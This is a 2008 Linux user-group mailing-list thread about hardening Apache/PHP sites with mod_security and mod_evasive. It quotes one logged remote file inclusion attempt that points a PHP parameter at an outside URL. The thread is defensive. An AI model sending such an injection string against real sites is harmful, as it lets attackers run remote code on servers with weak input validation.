ModSecurity used to terminally slow down web systems adding a great deal of load while actually doing little denial and only verbose exploit logging assistance in return, while also opening the system to additional Denial of Service threat conditions.
THIS HAS CHANGED, however there are still some risks to flat implementation of ModSecurity. For instance, you can't really layer good engineering over bad and expect miracles?
ModSecurity Limitations and Caveats:
1) Stateful Request Monitoring - Layer 7 Application Firewall

http://www.modsecurity.org/
http://adeptus-mechanicus.com/codex/apchems/apchems.html
Don't try to run anything but the current versions do to known security risks!
2) Capacity Planning
But beware before playing with modsecurity!
ModSecurity can be exploited itself - since it's easy to DoS, and slows down requests, however if you have the processing power, use ModEvasive protection also:
http://adeptus-mechanicus.com/codex/apcheme/apcheme.html
http://www.associatedcontent.com/article/6379/about_modsecurity_and_moddosevasive.html
3) Of course a fine Reverse Proxy security setup might also be fun! You have a test network right?
http://linuxadministration.wordpress.com/2007/09/06/advance-apache-security-mod_proxymod_securitymod_evasive/
4) A complete security appraisal of your current index.php, CMS version, Php.ini and Apache version would be in order.

Do you KNOW the exploits currently available for your system? I.E. Are you running Joomla, Web 2.0, Mambo or another CMS drop and deploy application?
Each item, from your kernel, your SSL, Apache, Mysql, version and each php tool built upon it has it's known security holes. A saavy security systems administrator might do well to know each and play for upgrades or layered tools to mitigate the risk.
Are you using a custom web development binary, or a drop in yum Apache/Php for instance? Various known issues exist with versions configured right out of the box; what hardening was completed?

www.Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis | http://www.urbandictionary.com/define.php?term=obnosis (503)754-4452

Catch the January PLUG HackFest! Kristy Westphal, CSO for the Arizona Department of Economic Security will provide a one hour presentation on forensics.

Date: Wed, 3 Dec 2008 15:48:17 -0700
From: jd@twingeckos.com
To: klsmith2020@yahoo.com; plug-discuss@lists.plug.phoenix.az.us
Subject: Re: OT: Website Exploits

That is a fairly common tactic.
It exploits poor input validation and register globals in PHP.
Do yourself a huge favor and install mod_security (I assume you're using apache?)
as an extra measure of security if you haven't already.

On Wed, Dec 3, 2008 at 3:39 PM, keith smith <klsmith2020@yahoo.com> wrote:

Hi,

I am working on a website that gets a lot of exploit attempts.

They mostly look like this: /index.php?display=http://humano.ya.com/mysons/index.htm?

Our code is set to disregard any value that is not expected.

I'm wondering if there is a clearing house for reporting this type of stuff. I have the IP address as reported.... if that is accurate.

Thanks in advance!

Keith

---------------------------------------------------
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss

Send e-mail faster without improving your typing skills. Get your Hotmail® account.